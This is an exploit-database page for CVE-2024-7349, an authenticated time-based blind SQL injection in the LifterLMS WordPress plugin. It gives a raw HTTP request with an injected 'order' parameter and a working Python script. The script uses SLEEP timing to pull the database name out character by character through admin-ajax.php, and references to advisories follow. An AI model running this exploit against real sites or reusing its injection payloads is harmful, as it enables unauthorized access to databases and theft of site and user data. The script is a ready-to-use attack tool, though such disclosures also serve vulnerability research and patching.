LifterLMS - Blind SQL Injection

2024.10.25
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: LifterLMS - Blind SQL Injection # Date: 09/2024 # Exploit Author: FURKAN KARAARSLAN # Category: Webapps # CVE : CVE-2024-7349 # Version: 7.6.3 # Vendor: https://lifterlms.com/ # Remotely Exploitable: Yes # Authentication Required: Yes # CVSSv3.1 Score: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H # Details: https://www.byresearchers.net/2024/09/cve-2024-7349-lifterlms-775.html ############################################################################ # Request: # POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 # Host: 127.0.0.1 # Content-Length: 168 # Accept: application/json, text/javascript, */*; q=0.01 # Content-Type: application/x-www-form-urlencoded; charset=UTF-8 # X-Requested-With: XMLHttpRequest # sec-ch-ua-mobile: ?0 # User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 # Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 # Cookie: wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5Zeq; # Connection: close # #action=export_admin_table&handler=Students&page=1&order=ASC,sleep(5)&orderby=name&filter=&filterby=course_membership&search=&#per_page=25&_ajax_nonce=98cedbc865&post_id= ############################################################################ #Exploit Code import requests import time url = "http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" headers = { "Host": "127.0.0.1", "Content-Length": "168", "sec-ch-ua": '"Not-A.Brand";v="99", "Chromium";v="124"', "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36", "sec-ch-ua-platform": '"Windows"', "Origin": "http://127.0.0.1", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://127.0.0.1/wordpress/wp-admin/admin.php?page=llms-reporting", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Cookie": "wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7Ced0ece46aaebda96ea02600b26a591f260ecdb2ec7eec146285e45b994b19c0e; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7C24f5e9d7acbb1e7915b89f9375a0298dfabcd5d08f0f226d3831b46abdb27f11; wp_llms_session_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C%7C1718239319%7C%7C1718235719%7C%7C8ce81de66404741005a03ee3e5b747e1; wp-settings-time-1=1718217826", "Connection": "close" } def find_db_name(): db_name = "" for i in range(1, 21): for c in range(32, 127): payload = f"action=export_admin_table&handler=Students&page=1&order=ASC,(SELECT IF(ASCII(SUBSTRING(DATABASE(),{i},1))={c},SLEEP(2),0))&orderby=name&filter=&filterby=course_membership&search=&per_page=25&_ajax_nonce=98cedbc865&post_id=" start_time = time.time() response = requests.post(url, headers=headers, data=payload) end_time = time.time() if end_time - start_time > 2: db_name += chr(c) print(f"Found character: {chr(c)} at position {i}") break return db_name database_name = find_db_name() print(f"Database name: {database_name}")

References:

https://www.byresearchers.net/2024/09/cve-2024-7349-lifterlms-775.html
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lifterlms/lifterlms-775-authenticated-admin-sql-injection
https://www.cve.org/CVERecord?id=CVE-2024-7349
https://plugins.trac.wordpress.org/changeset/3139798/lifterlms/tags/7.7.6/includes/abstracts/abstract.llms.database.query.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7349


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top